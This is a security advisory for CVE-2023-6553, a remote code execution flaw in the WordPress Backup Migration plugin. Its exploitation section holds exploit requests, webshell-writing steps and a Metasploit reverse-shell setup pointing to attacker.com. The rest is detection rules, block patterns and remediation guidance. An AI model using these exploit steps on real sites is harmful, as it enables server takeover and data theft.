VULNERABILITY DATABASE · DECEMBER 11, 2023

CVE-2023-6553 - WordPress Backup Migration Plugin Remote Code Execution


VULNERABILITY INFO

Category: Vulnerabilities
Published: December 11, 2023
Author: LAYERWEB Security Team
Read time: 17 min

TAGS

#CVE-2023-6553 #WORDPRESS #BACKUP-MIGRATION #RCE #PHP-FILTER-CHAIN #UNAUTHENTICATED #REMOTE #EXPLOIT

Unauthenticated remote code execution in WordPress Backup Migration plugin (≤1.3.7) via PHP filter chain injection through Content-Dir header manipulation. Critical web application vulnerability enabling complete server compromise.

Vulnerability Overview

An unauthenticated remote code execution vulnerability exists in the WordPress Backup Migration plugin version 1.3.7 and below. The vulnerability can be exploited through manipulation of the Content-Dir HTTP header sent to the vulnerable endpoint /wp-content/plugins/backup-backup/includes/backup-heart.php. An attacker can leverage PHP filter chain encoding techniques to inject and execute arbitrary PHP code without authentication, leading to complete server compromise.

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
CVE: CVE-2023-6553
CWE: CWE-94 (Improper Control of Generation of Code)

Summary: The Backup Migration WordPress plugin contains a critical vulnerability that allows remote attackers to execute arbitrary PHP code through specially crafted HTTP headers. The exploit leverages PHP filter chain encoding to bypass input validation and achieve code execution via a require statement in the plugin's core functionality.

Affected Component

The vulnerability affects the following:

  • Plugin Name: Backup Migration (package name: backup-backup)
  • Affected Versions: All versions ≤ 1.3.7
  • Vendor: BackupBliss
  • Plugin Homepage: https://backupbliss.com/
  • WordPress Repository: https://wordpress.org/plugins/backup-backup/
  • Vulnerable Endpoint: /wp-content/plugins/backup-backup/includes/backup-heart.php
  • Vulnerable Parameter: Content-Dir HTTP header

Technical Details

Vulnerability Mechanism

The vulnerability exists due to insecure handling of the Content-Dir HTTP header in the backup-heart.php file. The plugin processes this header and passes it to a require statement without proper sanitization, allowing directory traversal and code injection.

PHP Filter Chain Technique

The exploit uses a PHP exploitation technique known as PHP filter chaining, which works as follows:

  1. Base64 Encoding: The PHP payload is handled in base64 form
  2. Character Conversion Chaining: Multiple convert.iconv stream filters are chained together to perform character encoding conversions
  3. Byte Prepending: Each conversion step prepends specific bytes to the stream
  4. Payload Construction: By carefully selecting filter combinations, arbitrary PHP code can be built up in front of any string
  5. Code Evaluation: The resulting payload is evaluated when the require statement reads through the filter chain

Example Filter Chain Structure:

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|
convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|
convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|
[...additional filter chains...]
/resource=php://temp

Attack Flow

  1. Attacker sends POST request to vulnerable endpoint
  2. Malicious PHP filter chain payload inserted in Content-Dir header
  3. Plugin processes header and constructs file path
  4. require statement evaluates the filter chain
  5. PHP payload executes with web server privileges
  6. Attacker achieves remote code execution

Root Cause Analysis

The vulnerability stems from:

  • Insufficient Input Validation: No sanitization of Content-Dir header values
  • Unsafe File Inclusion: Direct use of user-controlled input in require statement
  • Missing Authentication Checks: Endpoint accessible without WordPress authentication
  • Lack of Header Whitelisting: No validation of allowed header values
  • Inadequate Security Controls: No server-side input filtering on the endpoint (a Content Security Policy, being a browser-side control, would not have prevented this server-side code injection)

Exploitation

Prerequisites

  • Target WordPress site with Backup Migration plugin ≤ 1.3.7 installed
  • Network access to target web server
  • No authentication or special privileges required

Attack Scenario

Scenario 1: Initial Access and Reconnaissance

# Step 1: Verify plugin installation
curl -I https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php

# Step 2: Check plugin version (vulnerable ≤ 1.3.7)
curl https://target.com/wp-content/plugins/backup-backup/readme.txt | grep "Stable tag"

Scenario 2: Remote Code Execution

The attacker crafts a PHP filter chain payload that will execute arbitrary commands:

# Generate PHP filter chain for payload: <?php system($_GET['cmd']); ?>
# The actual filter chain is thousands of characters long
payload = generate_php_filter_chain("<?php system($_GET['cmd']); ?>")

# Send exploit request
headers = {
    'Content-Dir': payload
}

response = requests.post(
    'https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php',
    headers=headers
)

Scenario 3: Webshell Deployment

The exploit can write a persistent webshell to disk:

1. Generate filter chain for: <?php fwrite(fopen("x","a"),"\x73"); ?>
2. Write payload character-by-character to avoid size limits
3. Copy temporary file to shell.php
4. Access webshell at: /wp-content/plugins/backup-backup/includes/shell.php

Proof of Concept (PoC) / Exploit

Metasploit Module

The vulnerability has been weaponized in Metasploit Framework:

Module Path: exploit/unix/webapp/wp_backup_migration_rce

Basic Usage:

msf6 > use exploit/unix/webapp/wp_backup_migration_rce
msf6 exploit(wp_backup_migration_rce) > set RHOSTS target.com
msf6 exploit(wp_backup_migration_rce) > set TARGETURI /
msf6 exploit(wp_backup_migration_rce) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(wp_backup_migration_rce) > set LHOST attacker.com
msf6 exploit(wp_backup_migration_rce) > set LPORT 4444
msf6 exploit(wp_backup_migration_rce) > exploit

Advanced Configuration:

msf6 exploit(wp_backup_migration_rce) > set PAYLOAD_FILENAME backdoor.php
msf6 exploit(wp_backup_migration_rce) > set SSL true
msf6 exploit(wp_backup_migration_rce) > set VERBOSE true
msf6 exploit(wp_backup_migration_rce) > check
[+] The target appears to be vulnerable. Backup Migration Plugin version: 1.3.5
msf6 exploit(wp_backup_migration_rce) > exploit
[*] Writing the payload to disk, character by character, please wait...
[*] Sending stage (39927 bytes) to target
[*] Meterpreter session 1 opened
meterpreter >

Python PoC

Standalone Python exploit available at:

Repository: https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py

Usage Example:

# Clone the exploit repository
git clone https://github.com/Chocapikk/CVE-2023-6553.git
cd CVE-2023-6553

# Run the exploit
python3 exploit.py --url https://target.com --cmd "id"

# Interactive shell mode
python3 exploit.py --url https://target.com --shell

# Write webshell
python3 exploit.py --url https://target.com --webshell shell.php

Sample Output:

[+] Target: https://target.com
[+] Vulnerable endpoint found: backup-heart.php
[+] Generating PHP filter chain payload...
[+] Payload size: 8192 bytes
[+] Sending exploit request...
[+] Success! Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Remote code execution successful!

Manual Exploitation Steps

Step 1: Generate PHP Filter Chain

Use the PHP filter chain generator to create payload:

from php_filter_chain_generator import generate_payload

# Simple web shell
webshell = '<?php system($_GET["c"]); ?>'
filter_chain = generate_payload(webshell)

Step 2: Craft HTTP Request

POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Dir: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|[...LONG_FILTER_CHAIN...]/resource=php://temp
Content-Length: 0

Step 3: Write Persistent Backdoor

# Character-by-character write to avoid size limits
for char in '<?php system($_GET["cmd"]); ?>'; do
    curl -X POST https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php \
    -H "Content-Dir: [filter_chain_for_single_char]"
done

# Copy to accessible location
curl -X POST https://target.com/wp-content/plugins/backup-backup/includes/backup-heart.php \
-H "Content-Dir: [filter_chain_for_copy_command]"

Step 4: Execute Backdoor

# Execute commands via webshell
curl "https://target.com/wp-content/plugins/backup-backup/includes/backdoor.php?cmd=whoami"

Impact Assessment

Critical Risks

  1. Complete Server Compromise: Attackers gain arbitrary code execution with web server privileges (typically www-data or apache), allowing full control over the WordPress installation and potentially the entire server.

  2. Data Breach: Access to all WordPress data including user credentials, customer information, payment details, and proprietary content stored in the database.

  3. Lateral Movement: Compromised server can be used as pivot point to attack internal network infrastructure, other servers, and backend systems.

  4. Website Defacement: Attackers can modify website content, inject malicious scripts, or completely replace the site with attacker-controlled content.

  5. Malware Distribution: Server can be weaponized to serve malware, exploit kits, or participate in phishing campaigns targeting website visitors.

  6. Cryptomining: Installation of cryptocurrency miners consuming server resources and increasing operational costs.

  7. Backdoor Persistence: Attackers can establish multiple persistence mechanisms making remediation difficult and enabling re-compromise.

  8. SEO Poisoning: Injection of spam links and content to manipulate search engine rankings for malicious purposes.

  9. Supply Chain Attack: Compromised WordPress sites can be used to attack plugins, themes, or update mechanisms affecting downstream users.

  10. Regulatory Compliance Violation: Data breaches resulting from exploitation may trigger GDPR, PCI-DSS, HIPAA, or other regulatory penalties.

CVSS v3.1 Score

Base Score: 9.8 (Critical)

Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

  • Attack Vector (AV): Network - Exploitable remotely over the network
  • Attack Complexity (AC): Low - No special conditions required
  • Privileges Required (PR): None - No authentication needed
  • User Interaction (UI): None - Fully automated exploitation
  • Scope (S): Unchanged - Exploited component and impacted component are the same
  • Confidentiality (C): High - Complete disclosure of all files and data
  • Integrity (I): High - Complete modification of all system files
  • Availability (A): High - Complete denial of service or system shutdown

Detection Methods

Network-Based Detection

IDS/IPS Signature (Suricata, legacy content-modifier syntax; like every network signature below, it can only inspect the header on plaintext HTTP or behind a TLS-terminating proxy that forwards decrypted traffic):

alert http any any -> any any (msg:"CVE-2023-6553 WordPress Backup Migration RCE Attempt"; \
  flow:to_server,established; \
  content:"POST"; http_method; \
  content:"/wp-content/plugins/backup-backup/includes/backup-heart.php"; http_uri; \
  content:"Content-Dir"; http_header; \
  content:"php://filter"; http_header; \
  content:"convert.iconv"; http_header; \
  classtype:web-application-attack; \
  sid:20236553; rev:1;)

Suricata Rule (sticky-buffer syntax, Suricata 5+):

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT WordPress Backup Migration RCE CVE-2023-6553"; \
  flow:established,to_server; \
  http.method; content:"POST"; \
  http.uri; content:"/backup-heart.php"; \
  http.header; content:"Content-Dir"; \
  http.header; content:"php://filter/convert"; \
  reference:cve,2023-6553; \
  classtype:web-application-attack; \
  sid:2023655301; rev:1;)

Web Application Firewall (WAF) Rules

ModSecurity Rule:

SecRule REQUEST_HEADERS:Content-Dir "@rx php://filter.*convert\.iconv" \
    "id:9006553, \
    phase:1, \
    deny, \
    status:403, \
    log, \
    msg:'CVE-2023-6553 - WordPress Backup Migration RCE Attempt', \
    tag:'application-multi', \
    tag:'language-php', \
    tag:'platform-wordpress', \
    tag:'attack-rce', \
    tag:'OWASP_CRS', \
    tag:'capec/1000/152/242', \
    tag:'CVE-2023-6553'"

Nginx/WAF Configuration:

location ~ /wp-content/plugins/backup-backup/includes/backup-heart\.php$ {
    if ($http_content_dir ~* "php://filter") {
        return 403;
    }
    if ($http_content_dir ~* "convert\.iconv") {
        return 403;
    }
}

Log Analysis

Apache/Nginx Access Log Patterns:

Default combined-format access logs record neither request headers nor the request body, so the Content-Dir value is only searchable if the log format is extended to include it (nginx: add $http_content_dir to log_format; Apache: add %{Content-Dir}i to LogFormat). Without that, requests to the endpoint can only be flagged by method and URI.

# Search for exploitation attempts (requires a log format that records the Content-Dir header)
grep -E "backup-heart\.php.*php://filter" /var/log/apache2/access.log

# Look for POST requests to the vulnerable endpoint (combined format: $6 is the quoted method, i.e. "POST)
awk '$6 == "\"POST" && $7 ~ /backup-heart\.php/ {print}' /var/log/nginx/access.log

# Find requests with PHP filter chains (header must be logged)
grep "convert.iconv" /var/log/apache2/access.log | grep "backup-backup"

WordPress Debug Log Monitoring (requires WP_DEBUG and WP_DEBUG_LOG to be enabled in wp-config.php):

# Check for suspicious file operations
grep -E "(fwrite|fopen|copy|file_put_contents)" /var/www/html/wp-content/debug.log

# Monitor for unusual require/include statements
grep -E "(require|include).*php://filter" /var/www/html/wp-content/debug.log
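The grep and awk one-liners above become fragile once log formats vary, so here is a small Python detector for the same patterns, added as an example and not taken from the original advisory. It assumes a combined-format access log, optionally extended with one trailing quoted field holding the Content-Dir header (nginx $http_content_dir or Apache %{Content-Dir}i); on a default line without that field it can still flag POSTs to the endpoint at lower confidence. The sample log lines are constructed.

```python
#!/usr/bin/env python3
"""Flag CVE-2023-6553 exploitation attempts in a web server access log.

Added example, not code from the original advisory. Assumes combined log format,
optionally extended with one trailing quoted field holding the Content-Dir header.
"""
import re
from typing import Dict, Iterable, List, Optional

# Combined log format plus the optional trailing quoted Content-Dir field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
    r'(?: "(?P<content_dir>[^"]*)")?'
)
ENDPOINT_SUFFIX = "/backup-backup/includes/backup-heart.php"
FILTER_RE = re.compile(r"php://filter", re.I)
ICONV_RE = re.compile(r"convert\.iconv", re.I)
RANK = {"low": 0, "medium": 1, "high": 2}


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a request to the vulnerable endpoint, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    if not d["path"].split("?", 1)[0].endswith(ENDPOINT_SUFFIX):
        return None
    hdr = d["content_dir"]  # None when the log format does not record the header
    if hdr and FILTER_RE.search(hdr) and ICONV_RE.search(hdr):
        confidence = "high"      # filter chain visible in the logged header
    elif d["method"] != "POST":
        return None              # the exploit uses POST; GET probes are ignored here
    elif hdr is None:
        confidence = "medium"    # header not logged: a POST to the endpoint is all we know
    else:
        confidence = "low"       # header logged and looks like an ordinary path
    return {"ip": d["ip"], "time": d["time"], "status": d["status"],
            "confidence": confidence, "content_dir": hdr or ""}


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Run classify() over every line and keep the findings."""
    return [f for f in map(classify, lines) if f]


def source_ips(findings: List[Dict[str, str]], min_confidence: str = "high") -> List[str]:
    """Unique source IPs at or above the given confidence, sorted (block-list candidates)."""
    floor = RANK[min_confidence]
    return sorted({f["ip"] for f in findings if RANK[f["confidence"]] >= floor})


# Constructed sample lines (not real traffic); the chain fragment is the advisory's abbreviated one
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2023:10:15:01 +0000] "POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 200 0 "-" "python-requests/2.31.0" "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7/resource=php://temp"',
    '198.51.100.7 - - [11/Dec/2023:10:16:44 +0000] "POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 500 0 "-" "curl/8.4.0"',
    '192.0.2.9 - - [11/Dec/2023:10:17:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [11/Dec/2023:10:18:02 +0000] "POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 200 12 "https://example.org/wp-admin/" "Mozilla/5.0" "wp-content/backup-migration"',
]

if __name__ == "__main__":
    findings = scan(SAMPLE_LOG)
    for f in findings:
        print(f"{f['confidence']:<6} {f['ip']:<15} {f['time']} status={f['status']}")
    print("block candidates:", source_ips(findings))
```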

File System Monitoring

OSSEC/Wazuh Rules:

<rule id="100553" level="12">
  <!-- syscheck parents: 554 = file added, 550 = checksum changed -->
  <if_sid>550,554</if_sid>
  <match>wp-content/plugins/backup-backup/includes</match>
  <!-- no end anchor: in syscheck alerts the path is followed by further text -->
  <regex>\.php</regex>
  <description>CVE-2023-6553: PHP file created or modified in Backup Migration plugin directory</description>
  <group>wordpress,web,attack,cve-2023-6553</group>
</rule>

File Integrity Monitoring:

# Monitor plugin directory for unauthorized changes
inotifywait -m -r -e create,modify /var/www/html/wp-content/plugins/backup-backup/includes/ \
  --format '%T %w%f %e' --timefmt '%Y-%m-%d %H:%M:%S'

# Check for new PHP files
find /var/www/html/wp-content/plugins/backup-backup/includes/ -name "*.php" -mtime -1

Runtime Detection

PHP-FPM Monitoring:

# PHP function names (system, exec, ...) never appear in a process listing. What they produce
# is a child process of a PHP-FPM worker, so list the workers' children instead; any shell or
# unexpected command here deserves a look
for p in $(pgrep -f 'php-fpm: pool'); do
    ps --ppid "$p" -o pid,user,etime,cmd --no-headers
done

# Check for unusual network connections from PHP processes
lsof -i -n -P | grep php-fpm | grep ESTABLISHED

WordPress Security Plugins:

  • Wordfence: Detects malicious file uploads and code execution attempts
  • Sucuri Security: Real-time malware scanning and firewall
  • iThemes Security: Blocks suspicious requests and monitors file changes

Mitigation & Remediation

Immediate Emergency Response

Step 1: Isolate Compromised System

# Block admin access while under attack. iptables string matching only works on plaintext
# HTTP; the port 443 rule cannot see inside TLS, so HTTPS must be blocked in the web server
iptables -A INPUT -p tcp --dport 80 -m string --string "/wp-admin" --algo bm -j DROP
iptables -A INPUT -p tcp --dport 443 -m string --string "/wp-admin" --algo bm -j DROP

# Block vulnerable endpoint specifically (nginx, inside the server block; reload nginx afterwards)
location ~ /wp-content/plugins/backup-backup/includes/backup-heart\.php$ {
    deny all;
}

Step 2: Disable Vulnerable Plugin

# Via WP-CLI
wp plugin deactivate backup-backup

# Via file system (if admin access compromised)
mv /var/www/html/wp-content/plugins/backup-backup \
   /var/www/html/wp-content/plugins/backup-backup.disabled

# Or rename the vulnerable file
mv /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php \
   /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php.bak

Step 3: Search for Indicators of Compromise

# Find recently modified files
find /var/www/html/wp-content/plugins/backup-backup/ -type f -mtime -7 -ls

# Search for webshells
grep -r "system\|passthru\|shell_exec\|eval\|base64_decode" \
  /var/www/html/wp-content/plugins/backup-backup/includes/

# Look for suspicious PHP files
find /var/www/html/wp-content/plugins/backup-backup/includes/ \
  -name "*.php" ! -name "backup-heart.php" ! -name "*.original.php"

# Check for backdoor accounts
wp user list --role=administrator --format=table

Step 4: Remove Artifacts

# List recently modified PHP files and review each one before removing anything; do not
# bulk-delete by age, because a plugin update also gives every legitimate file a fresh mtime
find /var/www/html/wp-content/plugins/backup-backup/includes/ \
  -name "*.php" -mtime -7 -ls

# Remove common webshell names (confirm each file is not part of the plugin first)
rm -f /var/www/html/wp-content/plugins/backup-backup/includes/{shell,c99,r57,b374k}.php
rm -f /var/www/html/wp-content/plugins/backup-backup/includes/[a-z].php

Vendor Patch Installation

Update to Secure Version:

# Update via WordPress admin dashboard
# Navigate to: Plugins → Installed Plugins → Backup Migration → Update

# Update via WP-CLI
wp plugin update backup-backup

# Verify patch installation
wp plugin list | grep backup-backup
# Should show version > 1.3.7 (patched version is 1.3.8+)

# Alternative: Remove and reinstall
wp plugin delete backup-backup
wp plugin install backup-backup --activate

Verify Patch Effectiveness:

# backup-heart.php still exists in patched releases, so its presence proves nothing;
# check the version in the plugin header instead (vulnerable: <= 1.3.7, patched: 1.3.8+)
grep "Version:" /var/www/html/wp-content/plugins/backup-backup/backup-backup.php

# Confirm the version WordPress has actually loaded matches
wp plugin get backup-backup --field=version
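Comparing the version string by eye or with a plain string comparison goes wrong once the plugin reaches 1.3.10 (which sorts before 1.3.8 as text). The following check, added here as an example and not part of the advisory or the plugin, parses the standard WordPress plugin header or readme.txt and compares numerically against the advisory's ≤ 1.3.7 range; the sample file contents are constructed.

```python
#!/usr/bin/env python3
"""Decide whether an installed Backup Migration copy is still in the vulnerable range.

Added example, not code from the original advisory or the plugin. Reads "Version:"
from the plugin's main-file header or "Stable tag:" from readme.txt and compares
numerically, so that 1.3.10 is treated as newer than 1.3.8.
"""
import re
from typing import Optional, Tuple

LAST_VULNERABLE = "1.3.7"   # advisory: all versions <= 1.3.7 are affected; 1.3.8 is patched


def parse_version(text: str) -> Tuple[int, ...]:
    """'1.3.10' -> (1, 3, 10); a pre-release suffix such as '-beta1' is dropped."""
    core = text.strip().split("-", 1)[0]
    nums = re.findall(r"\d+", core)
    if not nums:
        raise ValueError(f"not a version string: {text!r}")
    return tuple(int(n) for n in nums)


def version_le(a: str, b: str) -> bool:
    """True if version a <= version b; shorter tuples are padded with zeros."""
    ta, tb = parse_version(a), parse_version(b)
    width = max(len(ta), len(tb))
    return ta + (0,) * (width - len(ta)) <= tb + (0,) * (width - len(tb))


def is_vulnerable(version: str) -> bool:
    """Vulnerable if the installed version is at or below the last affected release."""
    return version_le(version, LAST_VULNERABLE)


def version_from_plugin_header(php_source: str) -> Optional[str]:
    """Extract 'Version:' from a WordPress plugin header comment block."""
    m = re.search(r"^\s*\*?\s*Version:\s*(\S+)", php_source, re.M)
    return m.group(1) if m else None


def version_from_readme(readme: str) -> Optional[str]:
    """Extract 'Stable tag:' from a WordPress readme.txt."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme, re.M | re.I)
    return m.group(1) if m else None


def assess(php_source: str) -> str:
    """Human-readable verdict for the contents of backup-backup.php."""
    v = version_from_plugin_header(php_source)
    if v is None:
        return "unknown: no Version header found"
    return f"{'VULNERABLE' if is_vulnerable(v) else 'patched'} (version {v})"


# Constructed samples mimicking the files the advisory greps (not the real plugin sources)
SAMPLE_HEADER_OLD = "<?php\n/**\n * Plugin Name: Backup Migration\n * Version: 1.3.7\n */\n"
SAMPLE_HEADER_NEW = "<?php\n/**\n * Plugin Name: Backup Migration\n * Version: 1.3.10\n */\n"
SAMPLE_README = "=== Backup Migration ===\nRequires PHP: 7.0\nStable tag: 1.3.8\n"

if __name__ == "__main__":
    print(assess(SAMPLE_HEADER_OLD))
    print(assess(SAMPLE_HEADER_NEW))
    print("readme stable tag:", version_from_readme(SAMPLE_README))
```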

Defense-in-Depth Hardening

1. Web Application Firewall Configuration

Deploy WAF rules to block PHP filter chain attacks:

# ModSecurity - Block PHP wrappers in any request header (legitimate headers never carry these)
SecRule REQUEST_HEADERS "@rx php://(filter|input|output|fd|memory|temp)" \
    "id:9006554,phase:1,deny,status:403,msg:'Blocked PHP wrapper usage'"

# Block base64 markers, but only in the Content-Dir header: matching "base64" across all
# headers would also reject legitimate cookies or custom headers that contain the word
SecRule REQUEST_HEADERS:Content-Dir "@rx base64" \
    "id:9006555,phase:1,deny,status:403,msg:'Blocked base64 in Content-Dir header'"

2. PHP Security Hardening

; /etc/php/8.1/fpm/php.ini (path varies with PHP version and distribution)

; Disable dangerous functions. These limit what injected code can do but do not stop the
; php://filter inclusion itself. curl_exec/curl_multi_exec are used by the WordPress HTTP API
; (updates, cron, plugin checks); test that the site still functions before keeping them here
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

; Restrict remote wrappers and file reach. php://filter is a local wrapper, so
; allow_url_include = Off does not block filter chains; open_basedir still limits which
; files injected code can read or write
allow_url_fopen = Off
allow_url_include = Off
open_basedir = /var/www/html:/tmp

; Error handling: log errors server-side, never display them to clients
display_errors = Off
log_errors = On
error_log = /var/log/php-fpm/error.log

3. WordPress Security Best Practices

// wp-config.php security enhancements

// Disable file editing from the admin panel. DISALLOW_FILE_MODS also blocks plugin and
// theme installs/updates from the dashboard, so updates must then be done via WP-CLI
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);

// Force SSL for admin
define('FORCE_SSL_ADMIN', true);

// Security keys: replace the placeholders with unique values (e.g. from
// https://api.wordpress.org/secret-key/1.1/salt/, which also supplies the matching *_SALT keys)
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');

// Limit login attempts: WordPress core has no constant for this (a define of
// LIMIT_LOGIN_ATTEMPTS has no effect); use a rate-limiting plugin or web server rules

4. File Permission Hardening

# Set ownership. Giving the web server account write access to the plugin tree lets WordPress
# update plugins itself, but it also lets injected code rewrite plugin files; a stricter layout
# owns the files by a separate deploy user and grants www-data read access only
chown -R www-data:www-data /var/www/html/wp-content/plugins/

# Restrict permissions
find /var/www/html/wp-content/plugins/ -type d -exec chmod 755 {} \;
find /var/www/html/wp-content/plugins/ -type f -exec chmod 644 {} \;

# Make backup-heart.php read-only (after patching); run chattr -i before the next plugin update
chmod 444 /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php
chattr +i /var/www/html/wp-content/plugins/backup-backup/includes/backup-heart.php

5. Network Segmentation

# Restrict access to the endpoint directory to local addresses only (Apache vhost config).
# Browser-side requests to backup-heart.php from other addresses are refused too, so verify
# the plugin's backup and restore functions still work from the allowed networks
<Directory /var/www/html/wp-content/plugins/backup-backup/includes>
    Require ip 127.0.0.1
    Require ip ::1
</Directory>

# Or allow-list internal ranges
<Directory /var/www/html/wp-content/plugins/backup-backup/includes>
    Require ip 10.0.0.0/8
    Require ip 192.168.0.0/16
</Directory>

6. Runtime Application Self-Protection (RASP)

Deploy runtime protection to detect and block exploit attempts in real time. The steps below set up ModSecurity with the OWASP Core Rule Set; strictly speaking this is a web application firewall rather than a RASP agent, but it is the usual way to get request-level blocking on an Apache host:

# Install mod_security (Debian/Ubuntu) and switch it from detection-only to blocking
apt-get install libapache2-mod-security2
cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
sed -i 's/^SecRuleEngine DetectionOnly/SecRuleEngine On/' /etc/modsecurity/modsecurity.conf
a2enmod security2

# Enable OWASP Core Rule Set
cd /etc/modsecurity
git clone https://github.com/coreruleset/coreruleset
cp coreruleset/crs-setup.conf.example coreruleset/crs-setup.conf
# Reference the rule set from /etc/apache2/mods-enabled/security2.conf, then reload:
#   IncludeOptional /etc/modsecurity/coreruleset/crs-setup.conf
#   IncludeOptional /etc/modsecurity/coreruleset/rules/*.conf
apachectl configtest && systemctl reload apache2

Monitoring and Continuous Protection

1. Implement Security Monitoring

# Deploy Fail2Ban jail for WordPress. The filter matches the filter chain in the logged
# Content-Dir value, so the access log format must record that header
# (nginx: $http_content_dir; Apache: %{Content-Dir}i)
cat >> /etc/fail2ban/jail.local << 'EOF'
[wordpress-rce]
enabled = true
filter = wordpress-rce
action = iptables-multiport[name=WordPressRCE, port="http,https"]
logpath = /var/log/apache2/access.log
maxretry = 1
bantime = 86400
EOF

# Create filter (the header name itself is never in the log, only its value)
cat > /etc/fail2ban/filter.d/wordpress-rce.conf << 'EOF'
[Definition]
failregex = ^<HOST> .*"POST [^"]*backup-heart\.php[^"]*".*php://filter
ignoreregex =
EOF

fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/wordpress-rce.conf
systemctl restart fail2ban

2. Automated Vulnerability Scanning

# Use WPScan for continuous monitoring (vp = vulnerable plugins; the API token is needed for vulnerability data)
wpscan --url https://target.com --enumerate vp --api-token YOUR_API_TOKEN

# Schedule daily scans (add this line with crontab -e), writing results to a file for review
0 2 * * * /usr/local/bin/wpscan --url https://target.com --enumerate vp --api-token YOUR_API_TOKEN --output /var/log/wpscan/daily.txt --format cli-no-colour

3. Security Information and Event Management (SIEM)

Configure log forwarding to SIEM:

# Rsyslog configuration for centralized logging. Apache access logs are written to files,
# not to syslog, so they must be read with imfile; php-fpm only reaches syslog if its
# error_log/syslog settings send it there
cat > /etc/rsyslog.d/50-wordpress.conf << 'EOF'
module(load="imfile")
input(type="imfile" File="/var/log/apache2/access.log" Tag="apache-access:" Facility="local6" Severity="info")
input(type="imfile" File="/var/log/apache2/error.log" Tag="apache-error:" Facility="local6" Severity="warning")
local6.* @@siem-server:514
:programname, isequal, "php-fpm" @@siem-server:514
EOF

systemctl restart rsyslog

Incident Response Playbook

Phase 1: Detection and Analysis

# 1. Confirm exploitation (matches only if the access log format records the Content-Dir header)
grep "php://filter.*convert.iconv" /var/log/apache2/access.log

# 2. Identify source IPs of POST requests to the vulnerable endpoint ($6 is the quoted method)
awk '$6 == "\"POST" && $7 ~ /backup-heart\.php/ {print $1}' /var/log/apache2/access.log | sort -u > attacker_ips.txt

# 3. Timeline analysis (time, source, method, status)
grep "backup-heart\.php" /var/log/apache2/access.log | \
  awk '{print $4, $5, $1, $6, $9}' | sort

# 4. Check for data exfiltration or reverse shells: established connections owned by the web server user
lsof -i -n -P -u www-data | grep ESTABLISHED

Phase 2: Containment

# 1. Block attacker IPs (the list built in Phase 1, step 2)
for ip in $(cat attacker_ips.txt); do
    iptables -A INPUT -s "$ip" -j DROP
done

# 2. Disable vulnerable component, preserving it as evidence
mkdir -p /root/evidence
mv /var/www/html/wp-content/plugins/backup-backup \
   /root/evidence/backup-backup.$(date +%Y%m%d)

# 3. Terminate every process running as the web server user (PHP-FPM workers and anything
# they spawned); the php-fpm master runs as root and respawns clean workers
pkill -9 -u www-data

# 4. Enable maintenance mode
wp maintenance-mode activate

Phase 3: Eradication

# 1. Full malware scan: report only. Removing files before the system is imaged destroys evidence
clamscan -r --infected /var/www/html/ > /root/evidence/clamscan.txt

# 2. Database cleanup: review first, then delete only confirmed rogue entries
wp db query "SELECT ID, user_login, user_email, user_registered FROM wp_users ORDER BY ID DESC LIMIT 20"
wp user delete <confirmed_rogue_user_id> --yes   # placeholder: an ID confirmed above; also removes its usermeta
wp db query "DELETE FROM wp_options WHERE option_name = '_transient_suspicious_key'"

# 3. Locate candidate backdoors for manual review. Core and legitimate plugins also call
# eval/base64_decode/system, so never delete on a string match alone
grep -rlE "eval\(|base64_decode\(|system\(" --include='*.php' /var/www/html | \
  xargs -r ls -l --time-style=long-iso

# 4. Restore from a known-clean backup if available (preferred over cleaning in place)
wp db import clean_backup.sql

Phase 4: Recovery

# 1. Update all components
wp plugin update --all
wp theme update --all
wp core update

# 2. Reset all passwords. The command substitution must run inside the loop so that each
# user gets a different random password (piping IDs through xargs evaluates it only once)
for id in $(wp user list --format=ids); do
    wp user update "$id" --user_pass="$(openssl rand -base64 32)" --skip-email
done

# 3. Regenerate security keys in place. Appending fresh salts from
# https://api.wordpress.org/secret-key/1.1/salt/ after the existing define() lines would
# leave duplicate constants, so let WP-CLI rewrite them
wp config shuffle-salts

# 4. Disable maintenance mode
